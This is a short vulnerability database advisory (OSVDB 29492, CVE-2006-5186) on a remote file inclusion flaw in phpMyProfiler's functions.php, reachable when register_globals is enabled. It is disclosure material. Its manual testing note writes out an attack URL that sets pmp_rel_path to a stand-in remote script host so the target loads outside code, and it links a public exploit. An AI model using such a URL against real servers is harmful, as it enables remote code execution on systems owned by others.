phpMyProfiler functions.php pmp_rel_path Variable Remote File Inclusion

2006-10-03T06:49:25
ID OSVDB:29492
Type osvdb
Reporter OSVDB
Modified 2006-10-03T06:49:25

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/functions.php?pmp_rel_path=http://[Evil_script]

References:

Vendor Specific News/Changelog Entry: http://forum.phpmyprofiler.de/viewtopic.php?p=2745#2745
Security Tracker: 1016980
Secunia Advisory ID: 22144
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0038.html
ISS X-Force ID: 29335
Generic Exploit URL: http://www.milw0rm.com/exploits/2470
FrSIRT Advisory: ADV-2006-3896
CVE-2006-5186
Bugtraq ID: 20324